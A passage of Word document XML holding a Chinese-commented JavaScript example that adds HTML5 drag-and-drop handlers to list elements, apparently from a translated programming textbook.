        <w:t>lists.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(regexp.test(lists[i].className))dnd(lists[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>为列表元素添加拖放事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function dnd(list){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>original_class=list.className;//</w:t>
      </w:r>
      <w:r>
        <w:t>保存原始</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var entered=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>跟踪进入和离开</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当拖放对象首次进入列表时调用这个处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它会检查拖放对象包含的数据格式它是否能处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果能，它返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>来表示有兴趣放置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在这种情况下，它会高亮拖放目标，让用户知道该兴趣</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.ondragenter=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e=e||window.event;//</w:t>
      </w:r>
      <w:r>
        <w:t>标准或</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var from=e.relatedTarget;//dragenter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>dragleave</w:t>
      </w:r>
      <w:r>
        <w:t>事件冒泡，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它使得在像＜</w:t>
      </w:r>
      <w:r>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有＜</w:t>
      </w:r>
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:t>＞子元素的情况下，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>何时高亮显示或取消高亮显示元素变得棘手</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在定义</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中，我们能跟踪它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，我们需要通过统计进入和离开的次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果从列表外面进入或第一次进入，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>那么需要做一些处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entered++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if((from</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>!ischild(from,list))||entered==1){//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的</w:t>
      </w:r>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>信息都在</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dt=e.dataTransfer;//</w:t>
      </w:r>
      <w:r>
        <w:t>dt.types</w:t>
      </w:r>
      <w:r>
        <w:t>对象列出可用的拖放数据的类型或格式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义这个对象有</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在一些浏览器中，它是一个有</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>以及之前版本中，它根本不存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var types=dt.types;//</w:t>
      </w:r>
      <w:r>
        <w:t>可用数据格式是什么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有任何类型的数据或可用数据是纯文本格式，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>那么高亮显示列表让用户知道我们正在监听拖放，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>同时返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>让浏览器知晓</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!types||//IE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(types.contains</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>types.contains("text/plain"))||//HTML5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(types.indexOf</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>types.indexOf("text/plain")!=-1))//Webkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>list.className=original_class+"droppable";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果我们无法识别数据类型，我们不希望拖放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return;//</w:t>
      </w:r>
      <w:r>
        <w:t>没有取消</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不是第一次进入，我们继续保持兴趣</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>当鼠标指</w:t>
      </w:r>
      <w:r>
        <w:t>针悬停在列表上时，会调用这个处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们必须定义这个处理程序并返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，否则这个拖放操作将取消</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.ondragover=function(e){return false;};//</w:t>
      </w:r>
      <w:r>
        <w:t>当拖放对象移出列表或从其子元素中移出时，会调用这个处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果我们真正离开这个列表（不是仅仅从一个列表项到另一个），</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>那么取消高亮显示它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.ondragleave=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e=e||window.event;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var to=e.relatedTarget;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果我们要到列表以</w:t>
      </w:r>
      <w:r>
        <w:t>外的元素或打破离开和进入次数的平衡，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>那么取消高亮显示列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entered--;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if((to</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>!ischild(to,list))||entered</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=0){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.className=original_class;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entered=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>当实际放置时，会调用这个程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们会接受放下的文本并将其放到一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.ondrop=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e=e||window.event;//</w:t>
      </w:r>
      <w:r>
        <w:t>获得事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获得放置的纯文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"Text"</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"text/plain"</w:t>
      </w:r>
      <w:r>
        <w:t>的昵称，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//IE</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>"text/plain"</w:t>
      </w:r>
      <w:r>
        <w:t>，所以在这里使用</w:t>
      </w:r>
      <w:r>
        <w:t>"Text"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dt=e.dataTransfer;//dataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=dt.getData("Text");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取放置的纯文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果得到一些文本，把它放入列表尾部的新项中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(text){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var item=document.createElement("li");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建新＜</w:t>
      </w:r>
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>item.draggable=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>使它可拖动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>item.a</w:t>
      </w:r>
      <w:r>
        <w:t>ppendChild(document.createTextNode(text));//</w:t>
      </w:r>
      <w:r>
        <w:t>添加文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.appendChild(item);//</w:t>
      </w:r>
      <w:r>
        <w:t>把它添加到列表中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复列表的原始样式且重置进入次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.className=original_class;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>entered=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>使原始所有列表项都可拖动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var items=list.getElementsByTagName("li");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>items.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>item</w:t>
      </w:r>
      <w:r>
        <w:t>s[i].draggable=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>为拖动列表项注册事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意我们把处理程序放在列表上，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>让事件从列表项向上冒泡</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当在列表中开始拖动对象，会调用这个处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.ondragstart=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var e=e||window.event;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var target=e.target||e.srcElement;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它不是从＜</w:t>
      </w:r>
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:t>＞向上冒泡，那么忽略它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if(target.tagName!=="LI")return </w:t>
      </w:r>
      <w:r>
        <w:t>false;//</w:t>
      </w:r>
      <w:r>
        <w:t>获得最重要的</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dt=e.dataTransfer;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置拖动的数据和数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>dt.setData("Text",target.innerText||target.textContent);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置允许复制和移动这些数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>dt.effectAllowed="copyMove";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>当成功的放置后，将调用这个处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.ondragend=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e=e||window.event;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var target=e.target|</w:t>
      </w:r>
      <w:r>
        <w:t>|e.srcElement;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果这个拖放操作是</w:t>
      </w:r>
      <w:r>
        <w:t>move</w:t>
      </w:r>
      <w:r>
        <w:t>，那么要删除列表项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>中，它将是</w:t>
      </w:r>
      <w:r>
        <w:t>"none"</w:t>
      </w:r>
      <w:r>
        <w:t>，除非在之前的</w:t>
      </w:r>
      <w:r>
        <w:t>ondrop</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序中显式设置它为</w:t>
      </w:r>
      <w:r>
        <w:t>move</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但为</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>强制设置</w:t>
      </w:r>
      <w:r>
        <w:t>"move"</w:t>
      </w:r>
      <w:r>
        <w:t>会阻止其他浏览器给用户选择复制还是移动的机会</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.dataTransfer.dropEffect==="move")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.parentNode.removeChild(target);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
